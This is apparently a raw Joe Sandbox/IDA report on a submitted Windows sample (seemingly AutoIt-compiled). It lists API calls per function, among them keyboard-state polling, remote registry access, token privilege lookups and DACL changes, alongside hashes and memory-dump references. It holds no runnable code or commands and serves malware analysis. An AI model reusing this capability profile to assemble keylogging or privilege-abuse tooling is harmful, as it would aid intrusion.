                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4136854206-1241985126
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 600699880-22481851
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3375834691-2160076837
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memcmp.LIBCMT ref: 00437001
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0043704B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1446985595-805462909
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2907320926-3566645568
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
• GetLengthSid.ADVAPI32(?), ref: 00445FE1
• GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
• GetLengthSid.ADVAPI32(?), ref: 00446052
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
• CopySid.ADVAPI32(00000000), ref: 00446082
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004460E9
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2634073740-771828931
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2294789929-1287834457
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433E6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00433E80
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433E90
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: I=D
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2360848162-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469E96
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469EBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2360848162-1403004172
